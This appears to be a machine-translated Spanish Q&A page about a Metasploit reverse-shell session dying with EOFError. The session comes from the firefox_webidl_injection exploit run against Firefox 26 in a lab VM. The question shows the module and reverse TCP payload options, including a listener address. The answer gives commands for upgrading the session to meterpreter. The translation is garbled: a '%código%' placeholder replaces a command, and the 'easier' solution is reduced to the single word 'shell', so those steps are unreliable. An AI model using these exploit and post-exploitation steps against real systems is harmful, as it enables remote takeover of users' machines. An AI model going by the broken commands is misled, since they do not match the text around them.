La sesión del shell del comando Metasploit murió a causa de EOFError

Navega tus respuestas
1

Estoy utilizando el multi/browser/firefox_webidl_injection exploit para atacar Firefox 26 en una máquina virtual Linux. He intentado usarlo con las siguientes cargas útiles: 1) firefox/shell_reverse_tcp y 2) generic/shell_reverse_tcp .

Mi problema es que recibo el mensaje que Command shell session opened , pero si espero algún tiempo, o trato de interactuar con esa sesión, obtengo el Command shell session closed. Reason: Died from EOFError

Con algunas búsquedas en Google encontré que este error probablemente significa que la carga útil no se ejecuta correctamente, pero ¿es correcto? Además, ¿qué puedo hacer para resolver este error?

Las opciones que uso son: 

msf exploit(firefox_webidl_injection) > options

Module options (exploit/multi/browser/firefox_webidl_injection):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CONTENT                   no        Content to display inside the HTML <body>.
   Retries  true             no        Allow the browser to retry the module
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  80               yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /                no        The URI to use for this exploit (default is random)


Payload options (firefox/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.8.0.2         yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Universal (Javascript XPCOM Shell)
    
pregunta Sotiris K 02.10.2017 - 10:03
fuente

1 respuesta

1

Debes actualizar la sesión a una sesión de meterpreter antes de que la sesión de firefox muera utilizando:

use post/multi/manage/shell_to_meterpreter

y establezca el ID de sesión de la sesión de firefox:

set session <id>

y luego ejecútalo:

run

Eso actualizará la sesión a un uno de meterpreter. Interactúas con él usando el comando

sessions -i <id>

Luego, si desea ingresar al shell nativo del sistema operativo, puede escribir %código% de la sesión de meterpreter

ACTUALIZAR

Una solución más fácil para actualizar las sesiones a un meterpreter es:

shell

donde id es el ID de sesión de Firefox en tu caso

    
respondido por el bolmaster2 06.05.2018 - 22:21
fuente

Lea otras preguntas en las etiquetas

¿Cuál es la forma más segura de identificar un dispositivo sin acción humana, por favor? ¿Cómo probar dmarc en un entorno cerrado?